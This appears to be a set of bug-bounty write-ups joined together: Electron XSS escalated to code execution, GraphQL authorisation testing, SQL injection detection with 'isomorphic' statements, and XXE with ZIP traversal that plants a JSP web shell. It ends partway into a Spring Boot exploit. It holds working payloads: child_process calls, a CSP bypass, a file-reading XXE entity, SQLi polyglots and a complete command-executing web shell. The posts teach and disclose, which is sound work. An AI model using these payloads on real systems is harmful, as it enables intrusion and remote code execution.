It's Node's World – We Just Live In It

For better or worse, Node.js has rocketed up the developer popularity charts. Thanks to frameworks like React, React Native, and Electron, developers can easily build clients for mobile and native platforms. These clients are delivered in what are essentially thin wrappers around a single JavaScript file.

As with any modern convenience, there are tradeoffs. On the security side of things, moving routing and templating logic to the client side makes it easier for attackers to discover unused API endpoints, unobfuscated secrets, and more. Check out Webpack Exploder, a tool I wrote that decompiles Webpacked React applications into their original source code.

For native desktop applications, Electron applications are even easier to decompile and debug. Instead of wading through Ghidra/Radare2/Ida and heaps of assembly code, attackers can use Electron's built-in Chromium DevTools. Meanwhile, Electron's documentation recommends packaging applications into asar archives, a tar-like format that can be unpacked with a simple one-liner.

With the source code, attackers can search for client-side vulnerabilities and escalate them to code execution. No funky buffer overflows needed – Electron's nodeIntegration setting puts applications one XSS away from popping calc.

Electron Hack Tweet The dangers of XSS in an Electron app as demonstrated by Jasmin Landry.

I love the whitebox approach to testing applications. If you know what you are looking for, you can zoom into weak points and follow your exploit as it passes through the code.

This blog post will go through my whitebox review of an unnamed Electron application from a bug bounty program. I will demonstrate how I escalated an open redirect into remote code execution with the help of some debugging. Code samples have been modified and anonymized.

From Whitebox to Exploit

My journey began one day when I spotted Jasmin's tweet and was inspired to do some Electron hacking myself. I began by installing the application on MacOS, then retrieved the source code:

  1. Browse to the Application folder.
  2. Right-click the application and select Show Package Contents.
  3. Enter the Contents directory that contains an app.asar file.
  4. Run npx asar extract app.asar source (Node should be installed).
  5. View the decompiled source code in the new source directory!

Discovering Vulnerable Config

Peeking into package.json, I found the configuration "main": "app/index.js", telling me that the main process was initiated from the index.js file. A quick check of index.js confirmed that nodeIntegration was set to true for most of the BrowserWindow instances. This meant that I could easily escalate attacker-controlled JavaScript to native code execution. When nodeIntegration is true, JavaScript in the window can access native Node.js functions such as require and thus import dangerous modules like child_process. This leads to the classic Electron calc payload require('child_process').execFile('/Applications/',function(){}).

Attempting XSS

So now all I had to do was find an XSS vector. The application was a cross-platform collaboration tool (think Slack or Zoom), so there were plenty of inputs like text messages or shared uploads. I launched the app from the source code with electron . --proxy-server=, proxying web traffic through Burp Suite.

I began testing HTML payloads like <b>pwned</b> in each of the inputs. Not long after, I got my first pwned! This was a promising sign. However, standard XSS payloads like <script>alert()</script> or <svg onload=alert()> simply failed to execute. I needed to start debugging.

Bypassing CSP

By default, you can access DevTools in Electron applications with the keyboard shortcut Ctrl+Shift+I or the F12 key. I mashed the keys but nothing happened. It appeared that the application had removed the default keyboard shortcuts. To solve this mystery, I searched for globalShortcut (Electron's keyboard shortcut module) in the source code. One result popped up:

electron.globalShortcut.register('CommandOrControl+H', () => {

Aha! The application had its own custom keyboard shortcut to open a secret menu. I entered CMD+H and a Developer menu appeared in the menu bar. It contained a number of juicy items like Update and Callback, but most importantly, it had DevTools! I opened DevTools and resumed testing my XSS payloads. It soon became clear why they were failing – an error message popped up in the DevTools console complaining about a Content Security Policy (CSP) violation. The application itself was loading a URL with the following CSP:

Content-Security-Policy: script-src 'self' 'unsafe-eval' https://* https://*

The CSP excluded the unsafe-inline policy, blocking event handlers like the svg payload. Furthermore, since my payloads were injected dynamically into the page using JavaScript, typical <script> tags failed to execute. Fortunately, the CSP had one fatal error: it allowed wildcard URLs. In particular, the https://* policy allowed me to include scripts from my own S3 bucket! To inject and execute a script tag dynamically, I used a trick I learned from Intigriti's Easter XSS challenge which used iframe's srcdoc attribute:

<iframe srcdoc='<script src=></script>'></iframe>

(I anonymized the source URL.)

With that, I got my lovely alert box! Adrenaline pumping, I modified evilscript.js to window.require('child_process').execFile('/Applications/',function(){}), re-sent the XSS payload, and... nothing.

We need to go deeper

We need to go deeper.

The Room of Requirement

Heading back to the DevTools console, I noticed the following error: Uncaught TypeError: window.require is not a function. This was perplexing, because when nodeIntegration is set to true, Node.js functions like require should be included in window. Going back to the source code, I noticed these lines of code when creating the vulnerable BrowserWindow:

const appWindow = createWindow('main', {
            width: 1080,
            height: 660,
            webPreferences: {
                nodeIntegration: true,
                preload: path.join(__dirname, 'preload.js')

Looking into preload.js:

window.nodeRequire = require;
delete window.require;
delete window.exports;
delete window.module;

Aha! The application was renaming/deleting require in the preload sequence. This wasn't an attempt at security by obscurity; it's boilerplate code from the Electron documentation in order to get third party JavaScript libraries like AngularJS to work! As I've mentioned previously, insecure configuration is a consistent theme among vulnerable applications. By turning on nodeIntegration and re-introducing require into the window, code execution becomes a singificant possibility.

With one more tweak (using window.parent.nodeRequire since I was I executing my XSS from an iframe), I sent off my new payload, and got my calc!

Drive-By Code Execution

Before I looked at the native application, I found an open redirect in the web application at the page However, the triager asked me to demonstrate additional impact. One feature of the native application was that it was able to open a new window from a web link in the browser.

Consider applications like Slack and Zoom. Have you ever wondered how you can open a link on, say,, and be prompted to open your Zoom application?

Zoom Prompt

That's because these websites are trying to open custom URL schemes that have been registered by the native application. For example, Zoom registers the zoommtg custom URL scheme with your operating system, so that if you have Zoom installed and try to open zoommtg:// in your browser (try it!), you will be prompted to open the native application. In some less-secure browsers, you won't even be prompted at all!

I noticed that the vulnerable application had a similar function. It would open a collaboration room in the native application if I visited a page on the website. Digging into the code, I found this handler:

function isWhitelistedDomain(url) {
    var allowed = [''];
    var test = extractDomain(url);

    if( allowed.indexOf(test) > -1 ) {
        return true;

    return false;

let launchURL = parseLaunchURL(fullURL)

if isWhitelistedDomain(launchURL) {
} else {

Let's break this down. When the native application is launched from a custom URL scheme (in this case, collabapp://, this URL is passed into the launch handler. The launch handler extracts the URL after collabapp://, checks that the domain in the extracted URL is, and loads the URL in the application window if it passes the check.

While the whitelist checking code itself is correct, the security mechanism is incredibly fragile. So long as there is a single open redirect in, you could force the native application to load an arbitrary URL in the application window. Combine that with the nodeIntegration vulnerability, and all you need is a redirect to an evil page that calls window.parent.nodeRequire(...) to get code execution!

My final payload was as follows: collabapp:// On evil.html, I simply ran window.parent.nodeRequire('child_process').execFile('/Applications/',function(){}).

Now, if the victim user visits any webpage that loads the evil custom URL scheme, calculator pops! Drive-by code execution without the browser zero-days.

This is the World We Live In

As new applications flourish in the wake of the COVID-19 pandemic, developers might be tempted to take shortcuts that could lead to devastating security holes. These vulnerabilities cannot be fixed quickly because they are caused by mistakes early on in the development cycle.

Think back to the nodeIntegration and preload issues with the vulnerable application – the application will always remain brittle and vulnerable unless these architectural and configuration issues are fixed. Even if they patch one XSS or open redirect, any new instance of those bugs will lead to code execution. At the same time, turning nodeIntegration off would break the entire application. It needs to be rewritten from that point onwards.

Node.js frameworks like Electron allow for developers to rapidly build native applications using languages and tools they are familiar with. However, the userland is a vastly different threat landscape; popping alert in your browser is very different from popping calc in your application. Developers and users should tread carefully.

This article was originally posted on my company's Medium blog. If you'd like to support me, give a clap and follow my Medium profile!


GraphQL is a modern query language for Application Programming Interfaces (APIs). Supported by Facebook and the GraphQL Foundation, GraphQL grew quickly and has entered the early majority phase of the technology adoption cycle, with major industry players like Shopify, GitHub and Amazon coming on board.

Innovation Adoption Lifecycle

As with the rise of any new technology, using GraphQL came with growing pains, especially for developers who were implementing GraphQL for the first time. While GraphQL promised greater flexibility and power over traditional REST APIs, GraphQL could potentially increase the attack surface for access control vulnerabilities. Developers should look out for these issues when implementing GraphQL APIs and rely on secure defaults in production. At the same time, security researchers should pay attention to these weak spots when testing GraphQL APIs for vulnerabilities.

With a REST API, clients make HTTP requests to individual endpoints.

For example:

  • GET /api/user/1: Get user 1
  • POST /api/user: Create a user
  • PUT /api/user/1: Edit user 1
  • DELETE /api/user/1: Delete user 1

GraphQL replaces the standard REST API paradigm. Instead, GraphQL specifies only one endpoint to which clients send either query or mutation request types. These perform read and write operations respectively. A third request type, subscriptions, was introduced later but has been used far less often.

On the backend, developers define a GraphQL schema that includes object types and fields to represent different resources.

For example, a user would be defined as:

type User {
  id: ID!
  name: String!
  email: String!
  height(unit: LengthUnit = METER): Float
  friends: \[User!\]!
  status: Status!

enum LengthUnit {

enum Status {

This simple example demonstrates several powerful features of GraphQL. It supports a list of other object types (friends), variables (unit), and enums (status). In addition, developers write resolvers, which define how the backend fetches results from the database for a GraphQL request.

To illustrate this, let’s assume that a developer has defined the following query in the schema:

  “name”: “getUser”,
  “description”: null,
  “args”: \[
      “name”: “id”,
      “description”: null,
      “type”: {
        “kind”: “SCALAR”,
        “name”: “ID”,
        “ofType”: null
      “defaultValue”: null
  “type”: {
    “kind”: “OBJECT”,
    “name”: “User”,
    “ofType”: null
  “isDeprecated”: false,
  “deprecationReason”: null

On the client side, a user would make the getUser query and retrieve the name and email fields through the following POST request:

POST /graphql
Content-Type: application/json

{“query”:”query getUser($id:ID!) { getUser(id:$id) { name email }}”,”variables”:{“id”:1},”operationName”:”getUser”}

On the backend, the GraphQL layer would parse the request and pass it to the matching resolver:

Query: {
  user(obj, args, context, info) {
    return context.db.loadUserByID(
      userData => new User(userData)

Here, args refers to the arguments provided to the field in the GraphQL query. In this case, is 1.

Finally, the requested data would be returned to the client:

  “data”: {
    “user”: {
      “name”: “John Doe”,
      “email”: “”

You may have noticed that the User object type also includes the friends field, which references other User objects. Clients can use this to query other fields on related User objects.

POST /graphql
Content-Type: application/json

{“query”:”query getUser($id:ID!) { getUser(id:$id) { name email friends { email }}}”,”variables”:{“id”:1},”operationName”:”getUser”}

Thus, instead of manually defining individual API endpoints and controller functions, developers can leverage the flexibility of GraphQL to craft complex queries on the client side without having to modify the backend. This makes GraphQL popular with serverless implementations like Apollo Server with AWS Lambda.

Trouble in Paradise

Remember the familiar line — with great power comes great responsibility? While GraphQL’s flexibility is a strong advantage, it can be abused to exploit access control and information disclosure vulnerabilities.

Consider the simple User object type and query. You might reasonably expect that a user can query the email of their friends. But what about the email of their friends’ friends? Without seeking authorisation, an attacker could easily obtain the emails of second-degree and third-degree connections using the following:

query Users($id: ID!) {
  user(id: $id) {
    friends {
      friends {
        friends {

In the classic REST paradigm, developers implement access controls for each individual controller or model hook. While potentially violating the Don’t Repeat Yourself (DRY) principle, this gives developers greater control over each call’s access controls.

GraphQL advises developers to delegate authorisation to the business logic layer rather than the GraphQL layer.

_Business Logic Layer

Business Logic Layer from GraphQL

As such, the authorisation logic sits below the GraphQL resolver. For instance, in this sample from GraphQL:

//Authorization logic lives inside postRepository
var postRepository = require(‘postRepository’);

var postType = new GraphQLObjectType({
  name: ‘Post’,
  fields: {
    body: {
      type: GraphQLString,
      resolve: (post, args, context, { rootValue }) => {
        return postRepository.getBody(context.user, post);

postRepository.getBody validates access controls in the business logic layer.

However, this isn’t enforced by the GraphQL specification. GraphQL recognises that it may be “tempting” for developers to place the authorisation logic incorrectly in the GraphQL layer. Unfortunately, developers fall into this trap far too often, creating holes in the access control layer.

Thinking in Graphs

So how should security researchers approach a GraphQL API? GraphQL recommends that developers “think in graphs” when modelling their data, and researchers should do the same. We can draw parallels to what I call “second-order Insecure Direct Object References (IDORs)” in the classic REST paradigm.

For example, in a REST API, while the following API call may be properly protected:

GET /api/user/1

A “second-order” API call may not be adequately protected:

GET /api/user/1/photo/6

The backend logic may have validated that the user requesting for user number 1 has read permissions to that user. However it has failed to check if they should also have access to photo number 6.

The same applies to GraphQL calls, except that with a graph schema, the number of possible paths increases exponentially. Take a social media photo for example: What if an attacker queries the users who have liked a photo, and in turn accesses their photos?

query Users($id: ID!) {
  user(id: $id) {
    photos {
      likes {
        user {
          photos {

What about the likes on those photos? The chain continues. In short, a security researcher should seek to “close the loop” in the graph and find paths towards their target object. Dominic Couture from GitLab explains this comprehensively in his post about his graphql-path-enum tool.

Let’s Get Down to Business

In most implementations of GraphQL APIs, you should be able to quickly identify the GraphQL endpoint because they tend to be simply /graphql or /graph. You can also identify them based on the requests made to these endpoints.

POST /graphql
Content-Type: application/json

{“query”: “query AllUsers { allUsers{ id } }”}

You should look out for key words like query and mutation. In addition, some GraphQL implementations use GET requests that look like this: GET /graphql?query=….

Once you’ve identified the endpoint, you should extract the GraphQL schema. Thankfully, the GraphQL specification supports such “introspection” queries that return the entire schema. This allows developers to quickly build and debug GraphQL queries. These introspection queries perform a similar function as the API call documentation tools, such as Swagger, in REST APIs.

We can adapt the introspection query from this gist:

query IntrospectionQuery {
  \_\_schema {
    queryType {
    mutationType {
    subscriptionType {
    types {
    directives {
      args {

fragment FullType on \_\_Type {
  fields(includeDeprecated: true) {
    args {
    type {
  inputFields {
  interfaces {
  enumValues(includeDeprecated: true) {
  possibleTypes {

fragment InputValue on \_\_InputValue {
  type {

fragment TypeRef on \_\_Type {
  ofType {
    ofType {
      ofType {

Of course, you will have to encode this for the method that the call is made with. To match the standard POST /graphql JSON format, use:

POST /graphql
Content-Type: application/json

{“query”: “query IntrospectionQuery {\_\_schema {queryType { name },mutationType { name },subscriptionType { name },types {…FullType},directives {name,description,args {…InputValue},locations}}}\\nfragment FullType on \_\_Type {kind,name,description,fields(includeDeprecated: true) {name,description,args {…InputValue},type {…TypeRef},isDeprecated,deprecationReason},inputFields {…InputValue},interfaces {…TypeRef},enumValues(includeDeprecated: true) {name,description,isDeprecated,deprecationReason},possibleTypes {…TypeRef}}\\nfragment InputValue on \_\_InputValue {name,description,type { …TypeRef },defaultValue}\\nfragment TypeRef on \_\_Type {kind,name,ofType {kind,name,ofType {kind,name,ofType {kind,name}}}}”}

Hopefully, this will return the entire schema so you can begin hunting for different paths to your desired object type. Several GraphQL frameworks, such as Apollo, acknowledge the dangers of exposing introspection queries and have disabled them in production by default. In such cases, you will have to feel your way forward by patiently brute-forcing and enumerating possible object types and fields. For Apollo, the server helpfully returns Error: Unknown type “X”. Did you mean “Y”? for a type or field that’s close to the actual value.

Security researchers should uncover as much of the original schema as possible. If you have the full schema, feel free to run it through tools like graphql-path-enum to enumerate different paths from one query to a target object type. In the example given by graphql-path-enum, if the target object type in a schema is Skill, the researcher should run:

$ graphql-path-enum -i ./schema.json -t Skill
Found 27 ways to reach the “Skill” node from the “Query” node:
 — Query (assignable\_teams) -> Team (audit\_log\_items) -> AuditLogItem (source\_user) -> User (pentester\_profile) -> PentesterProfile (skills) -> Skill
 — Query (checklist\_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit\_log\_items) -> AuditLogItem (source\_user) -> User (pentester\_profile) -> PentesterProfile (skills) -> Skill
 — Query (checklist\_check\_response) -> ChecklistCheckResponse (checklist\_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit\_log\_items) -> AuditLogItem (source\_user) -> User (pentester\_profile) -> PentesterProfile (skills) -> Skill
 — Query (checklist\_checks) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit\_log\_items) -> AuditLogItem (source\_user) -> User (pentester\_profile) -> PentesterProfile (skills) -> Skill
 — Query (clusters) -> Cluster (weaknesses) -> Weakness (critical\_reports) -> TeamMemberGroupConnection (edges) -> TeamMemberGroupEdge (node) -> TeamMemberGroup (team\_members) -> TeamMember (team) -> Team (audit\_log\_items) -> AuditLogItem (source\_user) -> User (pentester\_profile) -> PentesterProfile (skills) -> Skill

The results return different paths in the schema to reach Skill objects through nested queries and linked object types.

Security researchers should also go through the schema manually to discover paths that graphql-path-enum might have missed. Since the tool also requires a GraphQL schema to work, researchers that are unable to extract the full schema will also have to rely on manual inspection. To do this, consider various object types the attacker has access to, find their linked object types, and follow these links to the protected resource. Next, test these queries for access control issues.

For mutations, the approach is similar. Beyond testing for direct access control issues (mutations on objects you should not have access to), you will need to check the return values of mutations for linked object types.


GraphQL adds greater flexibility and depth to APIs by querying objects through the graph paradigm. However, it is not a panacea for access control vulnerabilities. GraphQL APIs are prone to the same authorisation and authentication issues that affect REST APIs. Additionally, its access controls still depend on developers to define appropriate business logic or model hooks, increasing the potential for human errors.

Developers should move their access controls as close to the persistence (model) layer as possible, and when in doubt, rely on frameworks with sane defaults like Apollo. In particular, Apollo recommends performing authorisation checks in data models:

Since the very beginning, we’ve recommended moving the actual data fetching and transformation logic from resolvers to centralized Model objects that each represent a concept from your application: User, Post, etc. This allows you to make your resolvers a thin routing layer, and put all of your business logic in one place.

For instance, the model for User would look like this:

export const generateUserModel = ({ user }) => ({
  getAll: () => {
    if(!user || !user.roles.includes(‘admin’)) return null;
    return fetch(‘');

By moving the authorisation logic to the model layer instead of spreading it across different controllers, developers can define a single “source of truth”.

In the long run, as GraphQL enjoys even greater adoption and reaches the late majority stage of the technology adoption cycle, more developers will implement GraphQL for the first time. Developers must carefully consider the attack surface of their GraphQL schemas and implement secure access controls to protect user data.

Further Reading

Special thanks to Dominic Couture, Kenneth Tan, Medha Lim, Serene Chan, and Teck Chung Khor for their inputs.

#infosec #graphql #appsec #programming


Despite the increased adoption of Object-Relational Mapping (ORM) libraries and prepared SQL statements, SQL injections continue to turn up in modern applications. Even ORM libraries have introduced SQL injections due to mistakes in translating object mappings to raw SQL statements. Of course, legacy applications and dangerous development practices also contribute to SQL injection vulnerabilities.

Initially, I faced difficulties identifying SQL injections. Unlike another common vulnerability class, Cross-Site Scripting (XSS), endpoints vulnerable to SQL injections usually don't provide feedback on where and how you're injecting into the SQL statement. For XSS, it's simple: with the exception of Blind XSS (where the XSS ends up in an admin panel or somewhere you don't have access to), you always see where your payload ends up in the HTML response.

For SQL injections, the best case scenario is that you get a verbose stack trace that tells you exactly what you need:

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8

<div id="error">
    <h1>Database Error</h1>
    <div class='message'>
        SQL syntax error near '''' where id=123' at line 1: update common_member SET name=''' where id=123

If you see this, it's your lucky day. More often, however, you will either get a generic error message, or worse, no error at all – only an empty response.

HTTP/1.1 200 OK
Content-Type: application/json

    "users": []

As such, hunting SQL injections can be arduous and time-consuming. Many researchers prefer to do a single pass with automated tools like sqlmap and call it a day. However, running these tools without specific configurations is a blunt instrument that is easily detected and blocked by Web Application Firewalls (WAF). Furthermore, SQL injections occur in unique contexts; you might be injecting after a WHERE or LIKE or ORDER BY and each context requires a different kind of injection. This is even before various sanitization steps are applied.

Polyglots help researchers use a more targeted approach. However, polyglots, by their very definition, try to execute in multiple contexts at once, often sacrificing stealth and succinctness. Take for example the SQLi Polyglots from Seclists:

SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/

Any half-decent WAF would pick up on these payloads and block them.

In real-world scenarios, researchers need to balance two concerns when searching for SQL injections:

  1. Ability to execute and thus identify injections in multiple contexts
  2. Ability to bypass WAFs and sanitization steps

A researcher can resolve this efficiently with something I call Isomorphic SQL Statements (although I'm sure other researchers have different names for it).

Incremental Approaches to Discovering Vulnerabilities

Going back to the XSS analogy, while XSS scanners and fuzzing lists are a dime a dozen, they usually don't work too well due to the above mentioned WAF blocking and unique contexts. Recently, more advanced approaches to automated vulnerability discovery have emerged which try to address the downsides of bruteforce scanning, like James Kettle's Backslash Powered Scanning. As Kettle writes,

Rather than scanning for vulnerabilities, we need to scan for interesting behaviour.

In turn, automation pipeline tools like Ameen Mali's qsfuzz and Project Discovery's nuclei test against defined heuristic rules (“interesting behaviour”) rather than blindly bruteforcing payloads. This is the path forward for large-scale vulnerability scanning as more organizations adopt WAFs and better development practices.

For example, when testing for an XSS, instead of asking “does an alert box pop when I put in this payload?”, I prefer to ask “does this application sanitize single quotes? How about angle brackets?” The plus side of this is that you can easily automate this on a large scale without triggering all but the most sensitive WAFs. You can then follow up with manual exploitation for each unique context.

The same goes for SQL injections. But how do you formulate your tests without any feedback mechanisms? Remember that SQL injections differ from XSS in that usually no (positive) response is given. Nevertheless, one thing I've learned from researchers like Ian Bouchard is that even no news is good news.

This is where Isomorphic SQL Statements come into play. Applied here, isomorphic simply means SQL statements that are written differently but theoretically should return the same output. However, the difference is that you will be testing SQL statements which include special characters like ' or -. If the characters are properly escaped, the injected SQL statement will fail to evaluate to the same result as the original. If they aren't properly escaped, you'll get the same result, which indicates an SQL injection is possible.

Let's illustrate this with a simple toy SQL injection:

    ID int key auto_increment,
    LastName varchar(255),
    FirstName varchar(255),
    Address varchar(255),
    City varchar(255)

INSERT INTO Users (LastName, FirstName, Address, City) VALUES ('Bird', 'Big', '123 Sesame Street', 'New York City'); 

INSERT INTO Users (LastName, FirstName, Address, City) VALUES ('Monster', 'Cookie', '123 Sesame Street', 'New York City'); 


If you are fuzzing with a large list of SQL polyglots, it would be relatively trivial to pick up the injection, but in reality the picture will be complicated by WAFs, sanitization, and more complex statements.

Next, consider the following statements:

SELECT FirstName FROM Users WHERE ID = 1;
SELECT FirstName FROM Users WHERE ID = 2-1;
SELECT FirstName FROM Users WHERE ID = 1+'';

They should all evaluate to the same result if the special characters in the last two statements are injected unsanitized. If they don't evaluate to the same results, the server is sanitizing them in some way.

DB Fiddle

Now consider a common version of a search query, SELECT Address FROM Users WHERE FirstName LIKE '%<USER INPUT>%' ORDER BY Address DESC;:

SELECT Address FROM Users WHERE FirstName LIKE '%Big%' ORDER BY Address DESC;
SELECT Address FROM Users WHERE FirstName LIKE '%Big%%%' ORDER BY Address DESC;
SELECT Address FROM Users WHERE FirstName LIKE '%Big%' '' ORDER BY Address DESC;

Simply by injecting the same special character % twice in the second statement, we are given a clue about the actual SQL statement you are injecting into (it's after a LIKE operator) if you receive the same response back.

Even better, as Arne Swinnen noted way back in 2013 (a pioneer!):

Strings: split a valid parameter’s string value in two parts, and add an SQL string concat directive in between. An identical response for both requests would again give you reason to believe you have just hit an SQL injection.

We can achieve the same isomorphic effect for strings as numeric IDs simply by adding ' ' to our injection in the third statement. This is interpreted as concatenating the original string with a blank string, which should also return the same response while indicating that ' isn't being properly escaped.

From here, it is a simple matter of experimenting incrementally. You thus achieve two objectives:

  1. Discover which injectable characters are entered unsanitized into the final SQL statement
  2. Discover the original SQL statement you are injecting into

Mass Automation and Caveats

The goal of this is not only to discover individual SQL injections, but to be able to automate and apply this across large numbers of URLs and inputs. Traditional SQL injection payload lists or scanners make large-scale scanning noisy and resource-intensive. With the incremental isomorphic approach, you apply a heuristic rule like:

if (response of id_input) === (response of id_input + "+''"):
    return true
    return false

This is much lighter and faster. Of course, while you gain in terms of fewer false negatives (e.g. polyglots that work but are blocked by WAFs), you lose in terms of more false positives. For example, there are cases where the backend simply trims all non-numeric characters before entering an SQL statement, in which case the above isomorphic statement would still succeed. Thus, rather than relying on a single isomorphic statement (binary signal), you will want to watch for multiple isomorphic statements succeeding (spectrum signal).

Although SQL injections are getting rarer, I've still come across them occasionally in manual tests. A mass scanning approach will yield even better results.

XML and ZIP – A Tale as Old As Time

While researching a bug bounty target, I came across a web application that processed a custom file type. Let's call it .xyz. A quick Google search revealed that the .xyz file type is actually just a ZIP file that contains an XML file and additional media assets. The XML file functions as a manifest to describe the contents of the package.

This is an extremely common way of packaging custom file types. For example, if you try to unzip a Microsoft Word file with unzip Document.docx, you would get:

Archive:  Document.docx
  inflating: [Content_Types].xml     
  inflating: _rels/.rels             
  inflating: word/_rels/document.xml.rels  
  inflating: word/document.xml       
  inflating: word/theme/theme1.xml   
  inflating: word/settings.xml       
  inflating: docProps/core.xml       
  inflating: word/fontTable.xml      
  inflating: word/webSettings.xml    
  inflating: word/styles.xml         
  inflating: docProps/app.xml        

Another well-known example of this pattern is the .apk Android app file, which is essentially a ZIP file that contains an AndroidManifest.xml manifest file and other assets.

However, if handled naively, this packaging pattern creates additional security issues. These “vulnerabilities” are actually features built into the XML and ZIP formats. Responsibility falls onto XML and ZIP parsers to handle these features safely. Unfortunately, this rarely happens, especially when developers simply use the default settings.

Here's a quick overview of these “vulnerable features.”

XML External Entities

The XML file format supports external entities, which allow an XML file to pull data from other sources, such as local or remote files. In some cases this can be useful because it makes importing data from various sources more convenient. However, in cases where an XML parser accepts user-defined inputs, a malicious user can pull data from sensitive local files or internal network hosts.

As the OWASP Foundation wiki states:

This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser... Java applications using XML libraries are particularly vulnerable to XXE because the default settings for most Java XML parsers is to have XXE enabled. To use these parsers safely, you have to explicitly disable XXE in the parser you use.

Just like in my previous Remote Code Execution writeup, developers are put at risk by vulnerable defaults.

ZIP Directory Traversal

Although ZIP directory traversal has been exploited since the format's inception, this attack vector gained prominence in 2018 due to Snyk's clumsily-named “Zip Slip” research/marketing campaign that found the vulnerability in many popular ZIP parser libraries.

An attacker can exploit this vulnerability with a ZIP file that contains directory traversal filenames such as ../../../../evil1/evil2/ When a vulnerable ZIP library tries to unzip this file, rather than unzipping to a temporary directory, it unzips it to another location in the filesystem defined by the attacker (in this case, /evil1/evil2). This can easily lead to remote code execution if an attacker overwrites a cron job script or creates a web shell in the web root directory.

Similar to XXEs, ZIP directory traversal is especially common in Java:

The vulnerability has been found in multiple ecosystems, including JavaScript, Ruby, .NET and Go, but is especially prevalent in Java, where there is no central library offering high level processing of archive (e.g. zip) files. The lack of such a library led to vulnerable code snippets being hand-crafted and shared among developer communities such as StackOverflow.

Discovering the XXE

Now that we have the theoretical foundations of the attack, let's move on to the actual vulnerability in practice. The application accepted uploads of the custom file type, unzipped them, parsed the XML manifest file, and returned a confirmation page with the manifest details. For example, if was a ZIP file containing the following manifest.xml:

<?xml version="1.0"?>
    <title>My Awesome Package</title>
    <author>John Doe</author>

I would get the following confirmation screen:

Package Info 1

The first thing I did was test for XSS. One tip about injecting XSS via XML is that XML doesn't support raw <htmltags> because this gets interpreted as an XML node, so you have to escape them in the XML like &lt;htmltags&gt;. Unfortunately, the output was sanitized properly.

The next move was to test for XXEs. Here, I made a mistake and began by testing for a remote external entity:

<?xml version="1.0"?>
<!DOCTYPE title [<!ENTITY xxe SYSTEM ''>]>
    <title>My Awesome Package&xxe;</title>
    <author>John Doe</author>

I didn't get a pingback on my Burp Collaborator instance and immediately assumed XXEs were blocked. This is a mistake because you should always test incrementally, starting with non-system external entities, working your way up to local files, and then remote files. This helps you eliminate various possibilities along the way. After all, a standard firewall rule would block outgoing web connections, causing a remote external entity to fail. However, this does not necessarily mean local external entities are blocked.

Fortunately, I decided to try again later with a local external entity:

<?xml version="1.0"?>
<!DOCTYPE title [<!ENTITY xxe SYSTEM 'file:///etc/hosts'>]>
    <title>My Awesome Package&xxe;</title>
    <author>John Doe</author>

That's when I struck gold. The contents of /etc/hosts appeared in the confirmation page.

Package Info 2

Pivoting to RCE

Typically in a white hat hacking scenario, you stick to a non-destructive proof-of-concept and stop there. With the XXE, I could expose local database files and several interesting web logs that included admin credentials. This was sufficient to write up a report.

However, there was another vulnerability I wanted to test: the ZIP parser. Remember that the app unzipped the package, read the manifest.xml file, and returned a confirmation page. I found an XXE in the second step, suggesting that there might be additional vulnerabilities in the rest of the flow.

To test for ZIP directory traversal, I used evilarc, a simple Python 2 script to generate ZIP files with directory traversal payloads. I needed to figure out where I wanted to place my traversal payload in the local file system. Here, the XXE helped. Local external entities support not just files but also directories, so if I used an external entity like file:///nameofdirectory, instead of the contents of a file, it would list the contents of the directory.

With a little digging through the directories, I eventually came across a file located at /home/web/resources/templates/sitemap.jsp. Its contents matched a page in the application – I zipped the contents of the sitemap page along with a web shell as ../../../../../../home/web/resources/templates/sitemap.jsp in my package. I kept the web shell hidden via a secret URL parameter to prevent casual users from accidentally coming across it:

<%@ page import="java.util.*,*"%>
    if (request.getParameter("spaceraccoon") != null) {
        out.println("Command: " + request.getParameter("spaceraccoon") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("spaceraccoon"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
            disr = dis.readLine(); 

I uploaded my package, browsed to and... nothing. The page looked exactly the same.

A common saying goes:

The definition of insanity is doing the same thing over and over again and expecting a different result.

This does not apply to black box testing. Latency, caching, and other quirks of the web can return different outputs for the same input. In this case, the server had cached the original version of, which is why it initially returned the page without my web shell. After several refreshes, my web shell kicked in, and the page returned the contents of the web root directory along with the rest of the sitemap page contents. I was in.

Convention over Configuration

Configuration Meme

From the writeup, you might have noticed that I was dealing with a Java application. This brings us back to OWASP and Snyk's warnings that Java is uniquely prone to mishandling XML and ZIP files. Due to a combination of unsafe defaults and a lack of default parsers, developers are forced to rely on random Stack Overflow snippets or third-party libraries.

However, Java is not the only culprit. Mishandling XML and ZIP files occurs across all programming languages and frameworks. Developers are expected to go out of their way to configure third-party libraries and APIs safely, which makes it easy to introduce vulnerabilities into an application. A developer only needs to make one mistake to introduce a vulnerability in their application. The probability of this increases with every additional “black box” library.

One approach to reduce vulnerabilities in development is Spotify's “Golden Path“:

At Spotify, one of our engineering strategies is the creation and promotion of the use of “Golden Paths.” Golden Paths are a blessed way to build products at Spotify. They consist of a set of APIs, application frameworks, best practices, and runtime environments that allow Spotify engineers to develop and deploy code safely, securely, and at scale. We complement these with opt-in programs that help increase quality. From our bug bounty program reports, we’ve found that the more that development adheres to a Golden Path, the less likely there is to be a vulnerability reported to us.

This boils down to a simple Ruby on Rails maxim: “Convention over configuration.”

Rather than relying on thousands of engineers to individually remember all the quirks of web application security, it is a lot more efficient to focus on a battle-tested set of frameworks and APIs and reduce the need to constantly tweak these settings.

Fortunately, organizations can solve this in a systemic manner by adhering to convention over configuration.

Major thanks to the security team behind the bug bounty program, who fixed the vulnerability in less than 12 hours and gave the go-ahead to publish this writeup.


The Spring Boot framework is one of the most popular Java-based microservice frameworks that helps developers quickly and easily deploy Java applications. With its focus on developer-friendly tools and configurations, Spring Boot accelerates the development process.

However, these development defaults can become dangerous in the hands of inexperienced developers. My write-up expands on the work of Michal Stepankin, who researched ways to exploit exposed actuators in Spring Boot 1.x and achieve RCE via deserialization. I provide an updated RCE method via Spring Boot 2.x's default HikariCP database connection pool and a common Java development database, the H2 Database Engine. I also created a sample Spring Boot application based on Spring Boot's default tutorial application to demonstrate the exploit.

Let's begin with the final payload:

POST /actuator/env HTTP/1.1

